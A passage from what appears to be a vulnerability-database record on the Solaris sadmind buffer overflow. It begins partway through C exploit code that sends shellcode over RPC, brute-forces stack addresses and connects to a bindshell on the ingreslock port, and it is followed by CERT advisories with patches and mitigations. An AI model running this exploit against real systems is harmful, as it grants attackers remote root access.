buflen[a]);\r\n\t\tjunk = junks[arch - 2];\r\n\t\tjunk &= 0xfffffffc;\r\n\r\n\t\tfor (i = 0, cp = buf + alignment[a]; i < junk / 4; i++) \r\n\t\t{\r\n\t\t\t*cp++ = (sp >> 0) & 0xff;\r\n\t\t\t*cp++ = (sp >> 8) & 0xff;\r\n\t\t\t*cp++ = (sp >> 16) & 0xff;\r\n\t\t\t*cp++ = (sp >> 24) & 0xff;\r\n\t\t}\r\n\r\n\t\taddr = sp + offset[a];\r\n\r\n\t\tfor (i = 0; i < addrlen[a] / 4; i++) \r\n\t\t{\r\n\t\t\t*cp++ = (addr >> 0) & 0xff;\r\n\t\t\t*cp++ = (addr >> 8) & 0xff;\r\n\t\t\t*cp++ = (addr >> 16) & 0xff;\r\n\t\t\t*cp++ = (addr >> 24) & 0xff;\r\n\t\t}\r\n\r\n\t\tslen = strlen(shellx86); \r\n\t\tclen = strlen(command);\r\n\t\tlen = clen; \r\n\t\tlen++; \r\n\t\tlen = -len;\r\n\t\tshellx86[lens[a]+0] = (len >> 0) & 0xff;\r\n\t\tshellx86[lens[a]+1] = (len >> 8) & 0xff;\r\n\t\tshellx86[lens[a]+2] = (len >> 16) & 0xff;\r\n\t\tshellx86[lens[a]+3] = (len >> 24) & 0xff;\r\n\t\tcp = buf + buflen[a] - 1 - clen - slen;\r\n\t\tmemcpy(cp, shellx86, slen); \r\n\t\tcp += slen;\r\n\t\tmemcpy(cp, command, clen); \r\n\t\tcp += clen;\r\n\t\t*cp = '\\xff';\r\n\t}\r\n\telse\r\n\t{\r\n\t\t/* Solaris SPARC */\r\n\t\tmemset(buf, '\\xff', buflen[a]);\r\n\t\tfp = sp + FRAMELEN1 + FRAMELEN2;\r\n\t\tfp &= 0xfffffff8;\r\n\t\taddr = sp + offset[a];\r\n\t\taddr &= 0xfffffffc;\r\n\r\n\t\tfor(i = 0, cp = buf + alignment[a]; i < addrlen[a] / 8; i++)\r\n\t\t{\r\n\t\t\t*cp++ = (fp >> 24) & 0xff;\r\n\t\t\t*cp++ = (fp >> 16) & 0xff;\r\n\t\t\t*cp++ = (fp >> 8) & 0xff;\r\n\t\t\t*cp++ = (fp >> 0) & 0xff;\r\n\t\t\t*cp++ = (addr >> 24) & 0xff;\r\n\t\t\t*cp++ = (addr >> 16) & 0xff;\r\n\t\t\t*cp++ = (addr >> 8) & 0xff;\r\n\t\t\t*cp++ = (addr >> 0) & 0xff;\r\n\t\t}\r\n\t\t\r\n\t\tslen = strlen(shellsparc);\r\n\t\tclen = strlen(command);\r\n\t\tlen = buflen[a] - 1 - clen - slen - addrlen[a] - alignment[a];\r\n\t\tlen &= 0xfffffffc;\r\n\t\tfor(i = 0; i < lens[a] / 4; i++)\r\n\t\t{\r\n\t\t\t*cp++ = (nops[a] >> 24) & 0xff;\r\n\t\t\t*cp++ = (nops[a] >> 16) & 0xff;\r\n\t\t\t*cp++ = (nops[a] >> 8) & 0xff;\r\n\t\t\t*cp++ = (nops[a] >> 0) & 0xff;\r\n\t\t}\r\n\t\tlen = clen;\r\n\t\tlen++;\r\n\t\tlen = -len;\r\n\t\tshellsparc[lens[a]+0] = (len >> 24) & 0xff;\r\n\t\tshellsparc[lens[a]+1] = (len >> 16) & 0xff;\r\n\t\tshellsparc[lens[a]+2] = (len >> 8) & 0xff;\r\n\t\tshellsparc[lens[a]+3] = (len >> 0) & 0xff;\r\n\t\tmemcpy(cp, shellsparc, slen);\r\n\t\tcp += slen;\r\n\t\tmemcpy(cp, command, clen);\r\n\t}\r\n\r\n\tbuf[buflen[a]] = '\\0';\r\n\tmemset(&send, 0, sizeof(struct nm_send));\r\n\tsend.header.uint2 = NETMGT_HEADER_TYPE;\r\n\tsend.header.string1 = \"\";\r\n\tsend.header.string2 = \"\";\r\n\tsend.header.string3 = \"\";\r\n\tsend.header.uint7 =\r\n\t\tstrlen(FW_VERSION) + 1 +\r\n\t\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\t\tstrlen(CLIENT_DOMAIN) + 1 +\r\n\t\t(4 * sizeof(unsigned int)) + strlen(buf) + 1 +\r\n\t\tstrlen(FENCE) + 1 +\r\n\t\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\t\tstrlen(NETMGT_ENDOFARGS) + 1;\r\n\tsend.version.string1 = FW_VERSION;\r\n\tsend.version.uint1 = NETMGT_ARG_INT;\r\n\tsend.version.uint2 = sizeof(int);\r\n\tsend.version.int1 = 1;\r\n\tsend.string.string1 = CLIENT_DOMAIN;\r\n\tsend.string.uint1 = NETMGT_ARG_STRING;\r\n\tsend.string.uint2 = strlen(buf);\r\n\tsend.string.string2 = buf;\r\n\tsend.fence.string1 = FENCE;\r\n\tsend.fence.uint1 = NETMGT_ARG_INT;\r\n\tsend.fence.uint2 = sizeof(int);\r\n\tsend.fence.int1 = 666;\r\n\tsend.footer.string1 = NETMGT_ENDOFARGS;\r\n\tcl = clnt_create(host, NETMGT_PROG, NETMGT_VERS, \"udp\");\r\n\r\n\tif (cl == NULL) \r\n\t{\r\n\t\tclnt_pcreateerror(\"clnt_create\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tcl->cl_auth = authunix_create(\"localhost\", 0, 0, 0, NULL);\r\n\r\n\tif (!pinging) \r\n\t{\r\n\t\ttm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\ttm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) \r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\tstat = clnt_call(cl, NETMGT_PROC_SERVICE,\r\n\t\t\txdr_nm_send, (caddr_t) &send,\r\n\t\t\txdr_nm_reply, (caddr_t) &reply, tm);\r\n\r\n\t\tif (stat != RPC_SUCCESS) \r\n\t\t{\r\n\t\t\tclnt_perror(cl, \"clnt_call\");\r\n\t\t\tfprintf(stdout, \"now check if exploit worked;\\n\");\r\n\t\t\treturn 0;\r\n\t\t}\r\n\r\n\t\tfprintf(stderr, \"exploit failed; \"\r\n\t\t\t\"RPC succeeded and returned { %u, %u, \\\"%s\\\" }\\n\",\r\n\t\t\treply.uint1, reply.uint2, reply.string1);\r\n\t\tclnt_destroy(cl);\r\n\t\texit(1);\r\n\t} \r\n\telse \r\n\t{\r\n\r\n\t\ttm.tv_sec = NETMGT_UDP_PING_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\ttm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) \r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\tstat = clnt_call(cl, NETMGT_PROC_PING,\r\n\t\t\txdr_void, NULL,\r\n\t\t\txdr_void, NULL, tm);\r\n\r\n\t\tif (stat != RPC_SUCCESS) \r\n\t\t{\r\n\t\t\tclnt_perror(cl, \"clnt_call\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\tclnt_destroy(cl);\r\n\t\treturn 0;\r\n\t}\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tint i, arch;\r\n\tchar *host = \"\";\r\n\tint pinging = 0, inc = 4, size = 2048;\r\n\tunsigned long int addr;\r\n\r\n\tfor(i=0;i<argc;i++)\r\n\t{\r\n\t\tif(!strcmp(argv[i], \"-t\"))\r\n\t\t\thost = argv[i+1];\t\r\n\t\tif(!strcmp(argv[i], \"-a\"))\r\n\t\t\tarch = atoi(argv[i+1]);\r\n\t\tif(!strcmp(argv[i], \"-i\"))\r\n\t\t\tinc = atoi(argv[i+1]);\r\n\t\tif(!strcmp(argv[i], \"-s\"))\r\n\t\t\tsize = atoi(argv[i+1]);\t\r\n\t\tif(!strcmp(argv[i], \"-p\"))\r\n\t\t\tpinging = 1;\r\n\t}\r\n\r\n\tif(arch > 3 || arch < 0)\r\n\t\tusage(argv[0]);\r\n\tif(size < 0)\r\n\t\tusage(argv[0]);\r\n\tif(inc < 0)\r\n\t\tusage(argv[0]);\r\n\r\n\tfor(i = 0; i < size; i+=inc)\r\n\t{\r\n\t\taddr = sp[arch] + i;\r\n\t\texp(host, arch, addr, pinging); \r\n\t\taddr = sp[arch] - i;\r\n\t\texp(host, arch, addr, pinging);\r\n\t}\r\n\r\n\texecl(\"telnet\", host, \"ingreslock\");\r\n\r\n\treturn 0;\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19672/"}], "cert": [{"lastseen": "2020-09-18T20:45:06", "bulletinFamily": "info", "cvelist": ["CVE-1999-0977"], "description": "### Overview \n\nThe sadmind program can be used to perform distributed system administration operations remotely using RPC. A stack buffer overflow in sadmind may be exploited by a remote attacker to execute arbitrary instructions and gain root access.\n\n### Description \n\nThe sadmind program is installed by default in Solaris 2.5, 2.5.1, 2.6, and 7. In Solaris 2.3 and 2.4, sadmind may be installed if the Sun Solstice Adminsuite packages are installed. The sadmind program is installed in /usr/sbin and can be used to coordinate distributed system administration operations remotely. The sadmind daemon is started automatically by the inetd daemon whenever a request to perform a system administration operation is received. \n\nAll versions of sadmind are vulnerable to a buffer overflow that can overwrite the stack pointer within a running sadmind process. Since sadmind is installed as root, it is possible to execute arbitrary code with root privileges on a remote machine. \n \nThis vulnerability has been discussed in public security forums and is actively being exploited by intruders. \n \n--- \n \n### Impact \n\nA remote user may be able to execute arbitrary code with root privileges on systems running vulnerable versions of sadmind. \n \n--- \n \n### Solution \n\nFrom Sun Security Bulletin #00191: \n \nSun announces the release of patches for Solaris(tm) 7, 2.6, 2.5.1, \n2.5, 2.4, and 2.3 (SunOS(tm) 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which \nrelate to a vulnerability with sadmind. \n \nSun recommends that you install the patches listed in section 4 \nimmediately on systems running SunOS 5.7, 5.6, 5.5.1, and 5.5 and \non systems with Solstice AdminSuite (AdminSuite) installed. If you have \ninstalled a version of AdminSuite prior to version 2.3, please upgrade \nto AdminSuite 2.3 before installing the AdminSuite patches listed in \nsection 4. \n \nSun also recommends that you: \n \n\\- disable sadmind if you do not use it by commenting the \nfollowing line in /etc/inetd.conf: \n \n100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind \n \n\\- set the security level used to authenticate requests to STRONG \nas follows, if you use sadmind: \n \n100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2 \n \nThe above changes to /etc/inetd.conf will take effect after inetd \nreceives a hang-up signal. \n \n--- \n \nAnother workaround to prevent remote intruders from accessing any vulnerable RPC services is to block all access to ports 111/{tcp,udp} at your site's network perimeter. \n \n--- \n \n### Vendor Information\n\n28934\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Sun __ Affected\n\nNotified: December 13, 1999 Updated: May 07, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see [Sun Security Bulletin #191](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba>). An excerpt is provided below.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE-----\n\n________________________________________________________________________________ \nSun Microsystems, Inc. Security Bulletin \n \nBulletin Number: #00191 \nDate: December 29, 1999 \nCross-Ref: CERT CA-99-16 \nTitle: sadmind \n________________________________________________________________________________ \n \nThe information contained in this Security Bulletin is provided \"AS IS.\" \nSun makes no warranties of any kind whatsoever with respect to the information \ncontained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, \nREPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR \nIMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE \nHEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. \n \nIN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, \nPROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL \nOR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY \nARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN \nTHIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF \nTHE POSSIBILITY OF SUCH DAMAGES. \n \nIf any of the above provisions are held to be in violation of applicable law, \nvoid, or unenforceable in any jurisdiction, then such provisions are waived \nto the extent necessary for this disclaimer to be otherwise enforceable in \nsuch jurisdiction. \n________________________________________________________________________________ \n \n1\\. Bulletins Topics \n \nSun announces the release of patches for Solaris(tm) 7, 2.6, 2.5.1, \n2.5, 2.4, and 2.3 (SunOS(tm) 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which \nrelate to a vulnerability with sadmind. \n \nSun recommends that you install the patches listed in section 4 \nimmediately on systems running SunOS 5.7, 5.6, 5.5.1, and 5.5 and \non systems with Solstice AdminSuite (AdminSuite) installed. If you have \ninstalled a version of AdminSuite prior to version 2.3, please upgrade \nto AdminSuite 2.3 before installing the AdminSuite patches listed in \nsection 4. \n \nSun also recommends that you: \n \n\\- disable sadmind if you do not use it by commenting the \nfollowing line in /etc/inetd.conf: \n \n100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind \n \n\\- set the security level used to authenticate requests to STRONG \nas follows, if you use sadmind: \n \n100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2 \n \nThe above changes to /etc/inetd.conf will take effect after inetd \nreceives a hang-up signal. \n \n2\\. Who is Affected \n \nVulnerable: SunOS 5.7, 5.7_x86, 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, \n5.5, 5.5_x86, and \n5.4, 5.4_x86, and 5.3 with AdminSuite installed \n \nNot vulnerable: All other supported versions of SunOS. \n \n3\\. Understanding the Vulnerability \n \nThe sadmind program is installed by default on SunOS 5.7, 5.6, 5.5.1, \nand 5.5. In SunOS 5.4 and 5.3, sadmind may be installed if the \nSolstice AdminSuite packages are installed. The sadmind program \nis installed in /usr/sbin. The program can be used to perform \ndistributed system administration operations remotely. A buffer overflow \nvulnerability has been discovered in sadmind which may be exploited by \na remote attacker to execute arbitrary instructions and gain root access. \n \n4\\. List of Patches \n \nThe following patches are available in relation to the above problem. \n \nOS Version Patch ID \n__________ _________ \nSunOS 5.7 108662-01 \nSunOS 5.7_x86 108663-01 \nSunOS 5.6 108660-01 \nSunOS 5.6_x86 108661-01 \nSunOS 5.5.1 108658-01 \nSunOS 5.5.1_x86 108659-01 \nSunOS 5.5 108656-01 \nSunOS 5.5_x86 108657-01 \n \nAdminSuite Version Patch ID \n__________________ ________ \n2.3 104468-18 (see Note) \n2.3_x86 104469-18 (see Note) \n \nNote: Install patch if AdminSuite is installed. AdminSuite may be \ninstalled on SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4 or 5.3. \n_______________________________________________________________________________ \n \nSun acknowledges, with thanks, Stanford University and the CERT Coordination \nCenter for their assistance in this matter. \n_______________________________________________________________________________ \nAPPENDICES \n \nA. Patches listed in this bulletin are available to all Sun customers at: \n \n \n[http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&amp;nav=pub-patches](<http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches>) \n \nB. Checksums for the patches listed in this bulletin are available at: \n \n<ftp://sunsolve.sun.com/pub/patches/CHECKSUMS> \n \nC. Sun security bulletins are available at: \n \n<http://sunsolve.sun.com/pub-cgi/secBulletin.pl> \n \nD. Sun Security Coordination Team's PGP key is available at: \n \n<http://sunsolve.sun.com/pgpkey.txt> \n \nE. To report or inquire about a security problem with Sun software, contact \none or more of the following: \n \n\\- Your local Sun answer centers \n\\- Your representative computer security response team, such as CERT \n\\- Sun Security Coordination Team. Send email to: \n \nsecurity-alert@sun.com \n \nF. To receive information or subscribe to our CWS (Customer Warning System) \nmailing list, send email to: \n \nsecurity-alert@sun.com \n \nwith a subject line (not body) containing one of the following commands: \n \nCommand Information Returned/Action Taken \n_______ _________________________________ \n \nhelp An explanation of how to get information \n \nkey Sun Security Coordination Team's PGP key \n \nlist A list of current security topics \n \nquery [topic] The email is treated as an inquiry and is forwarded to \nthe Security Coordination Team \n \nreport [topic] The email is treated as a security report and is \nforwarded to the Security Coordination Team. Please \nencrypt sensitive mail using Sun Security Coordination \nTeam's PGP key \n \nsend topic A short status summary or bulletin. For example, to \nretrieve a Security Bulletin #00138, supply the \nfollowing in the subject line (not body): \n \nsend #138 \n \nsubscribe Sender is added to our mailing list. To subscribe, \nsupply the following in the subject line (not body): \n \nsubscribe cws your-email-address \n \nNote that your-email-address should be substituted \nby your email address. \n \nunsubscribe Sender is removed from the CWS mailing list. \n________________________________________________________________________________ \n \nCopyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, \nSun Microsystems, Solaris and SunOS are trademarks or registered trademarks \nof Sun Microsystems, Inc. in the United States and other countries. This \nSecurity Bulletin may be reproduced and distributed, provided that this \nSecurity Bulletin is not modified in any way and is attributed to \nSun Microsystems, Inc. and provided that such reproduction and distribution \nis performed for non-commercial purposes. \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.2 \n \niQCVAwUBOGpY1bdzzzOFBFjJAQGKyQP/UX8fxEBWd/CXSdvcbrIOqiUafGcHvJ0R \n+/iQHifs5Uu7Zhgukzl4MLnN1Io1MgJFRsnesBMuRsPKxirckE3riLTkkLcmtHgF \n2nxXLSenYCqHS2lcWZg5L1y3bTWUBBkjBZw9LXwgFmZ1m63e5C7TOOKp9mp3tybQ \nJpyRVNynR8E= \n=sANI \n\\-----END PGP SIGNATURE----- \n \n \n \n \n \n \nCopyright 1994-2001 Sun Microsystems, Inc., 901 San Antonio Road, Palo Alto, CA 94303 USA. All rights reserved. \nTerms of Use. Privacy Policy. Feedback\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2328934 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n[http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&amp;doc=secbull/191&amp;type=0&amp;nav=sec.sba ](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba >)\n\n### Acknowledgements\n\nThis document was written by Jeff S Havrilla.\n\n### Other Information\n\n**CVE IDs:** | [CVE-1999-0977](<http://web.nvd.nist.gov/vuln/detail/CVE-1999-0977>) \n---|--- \n**CERT Advisory:** | [CA-1999-16 ](<http://www.cert.org/advisories/CA-1999-16.html>) \n**Severity Metric:** | 73.10 \n**Date Public:** | 1999-12-14 \n**Date First Published:** | 2001-05-07 \n**Date Last Updated: ** | 2001-05-16 15:11 UTC \n**Document Revision: ** | 5 \n", "modified": "2001-05-16T15:11:00", "published": "2001-05-07T00:00:00", "id": "VU:28934", "href": "https://www.kb.cert.org/vuls/id/28934", "type": "cert", "title": "Sun Solaris sadmind buffer overflow in amsl_verify when requesting NETMGT_PROC_SERVICE", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:44:11", "bulletinFamily": "info", "cvelist": ["CVE-1999-0977", "CVE-2003-0722"], "description": "### Overview \n\nThe sadmind service provided on many Solaris and SunOS systems ships with an insecure default configuration that allows remote users to execute arbitrary commands with superuser (root) privileges.\n\n### Description \n\nThe Sun Microsystems Solstice AdminSuite is a graphical tool that allows Solaris and SunOS hosts to be administered by a remote host. The daemon portion of the program (sadmind) is a setuid root application that listens for requests from a remote administration client. In its default configuration, sadmind accepts requests using \"AUTH_SYS\" authentication, which uses plaintext authentication in a format that can be easily manipulated by an attacker. Since sadmind is designed to allow the remote execution of arbitrary commands, an attacker who is able to spoof the authentication portion of a packet can execute commands with little difficulty.\n\nThe daemon can be configured to operate securely by specifying a security level of 2, which causes sadmind to require \"AUTH_DES\" authentication. This capability has existed since at least April 1999, when the [_sadmind man page_](<http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view>) was updated for SunOS 5.9. The recommendation to use security level 2 was provided in [_Sun Security Bulletin #00191_](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=secbull%2F191&display=plain>) and [_CERT Advisory CA-1999-16_](<http://www.cert.org/advisories/CA-1999-16.html>), so it is likely that many Solaris systems have been configured to disable this service. However, the insecure default configuration is still shipped with modern releases of Solaris, so system administrators are encouraged to review their configurations. \n \n--- \n \n### Impact \n\nAffected systems allow remote users to execute arbitrary commands with the privileges of the sadmind daemon, typically superuser (root). \n \n--- \n \n### Solution \n\nThe CERT/CC is not aware of a permanent solution that addresses this vulnerability. \n \n--- \n \n**Configure sadmind to use AUTH_DES authentication** \n \nAs recommended by [_Sun Alert __56740_](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=fsalert%2F56740&display=plain>), users can take the following steps to enable AUTH_DES authentication: \n \n1\\. Edit the \"/etc/inetd.conf\" file and append \"-S 2\" to the end of the sadmind line as follows: \n \n100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2 \n \n2\\. Tell the inetd(1M) process to reread the newly modified \"/etc/inetd.conf\" file by sending it a hangup signal, SIGHUP: \n \n# /usr/bin/pkill -HUP inetd \n \n**Disable the sadmind daemon** \n \nAs recommended by [_Sun Alert __56740_](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=fsalert%2F56740&display=plain>), users can take the following steps to disable sadmind: \n \n1\\. Edit the \"/etc/inetd.conf\" file and comment out the following line by adding the \"#\" symbol to the beginning of the line as follows: \n \n#100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind \n \n2\\. Tell the inetd(1M) process to reread the newly modified \"/etc/inetd.conf\" file by sending it a hangup signal, SIGHUP: \n \n# /usr/bin/pkill -HUP inetd \n \n--- \n \n### Vendor Information\n\n41870\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: April 03, 1999 Updated: September 19, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSun Microsystems has published Alert Notification 56740 to document this vulnerability. For more information, please see:\n\n \n[http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&amp;doc=fsalert%2F56740&amp;display=plain](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=fsalert%2F56740&display=plain>)\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2341870 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * [http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F56740&amp;zone_32=category%3Asecurity](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F56740&zone_32=category%3Asecurity>)\n * <http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view>\n * <http://www.idefense.com/advisory/09.16.03.txt>\n * <http://www.cert.org/advisories/CA-1999-16.html>\n * <http://www.kb.cert.org/vuls/id/28934>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0977>\n * <http://www.secunia.com/advisories/9742/>\n\n### Acknowledgements\n\nThe CERT/CC thanks Sun Microsystems for acknowledging this vulnerability.\n\nThis document was written by Jeffrey P. Lanza.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0722](<http://web.nvd.nist.gov/vuln/detail/CVE-2003-0722>) \n---|--- \n**Severity Metric:** | 104.74 \n**Date Public:** | 1999-04-03 \n**Date First Published:** | 2003-09-19 \n**Date Last Updated: ** | 2003-09-19 22:01 UTC \n**Document Revision: ** | 22 \n", "modified": "2003-09-19T22:01:00", "published": "2003-09-19T00:00:00", "id": "VU:41870", "href": "https://www.kb.cert.org/vuls/id/41870", "type": "cert", "title": "Sun Solstice AdminSuite ships with insecure default configuration", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}